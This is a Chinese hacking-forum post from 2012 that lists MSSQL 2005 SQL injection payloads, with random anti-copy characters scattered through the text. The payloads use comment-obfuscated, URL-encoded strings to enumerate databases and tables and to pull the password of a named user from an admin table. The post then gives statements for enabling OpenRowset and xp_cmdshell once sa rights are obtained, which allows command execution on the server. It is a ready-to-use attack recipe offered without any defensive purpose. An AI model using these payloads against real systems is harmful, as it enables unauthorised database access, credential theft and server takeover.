找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2257|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
- N* L% W% t% B" n1 K6 d, ]% m
. n  j) N' w1 t$ v( N
3 V9 U2 p: e1 e
[Copy to clipboard]CODE:, u% z8 \3 k4 ~! c" O# Z
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
6 d# ?1 }& V0 ^  S' `& x% Y9 H+ z2 U! z: k+ g0 m& J
爆表语句,somedb部份是所要列的数据库,红色数字1累加
( P$ @4 ^5 `  r6 J' x* a( x' @4 ~
1 B% o# X' o2 n0 m" z
8 f+ O+ q3 R) U[Copy to clipboard]CODE:
: p& t; @" Y0 _% Y/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
$ g! [) @& ]: I- j
& Z4 \+ k; V. h! J/ w0 Z爆字段语句,爆表admin里user='icerover'的密码段
& P+ K$ y, v' n0 j, b5 N) {/ l# N, W9 m* d% E

2 @- D  b% M' a5 S8 h[Copy to clipboard]CODE:, Y: v8 M. f- \
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--6 b! p* H) \( G, L; S# x
" ?: S$ ?; F$ d6 h0 \2 T
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
8 V7 F7 Q! R4 g6 |. u如果是sa权限,可以这样来开启
4 U" R& ?/ f, y: P) V开启openrowset" f  [4 Y7 c3 p" J- d+ {
: U9 K4 [) `' z# T
  x  z) Y- Q! L7 Q/ V8 g7 k7 S
[Copy to clipboard]CODE:
; P  p: b0 E) y$ F) Q/ m/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
8 a) k: y% {9 r! c$ K/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
) d: U0 `6 B  c9 N9 F- z
( U8 e+ n; ^) X1 G开启xp_cmdshell, C2 ^1 i' b/ a! i
! V. R3 H$ F8 p2 G) a3 ]
' V- Q; _! l6 B& z2 y
[Copy to clipboard]CODE:5 U2 C2 H0 u" x" T. s. l, z% J
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--6 K+ x' l% N0 p" P; q. w, X5 V
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
' w9 O- W! @) O& ?) ~, ^- y! f! R8 j, o5 v, R: o2 V
ok,over~~晚安. E! [% P  g% O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表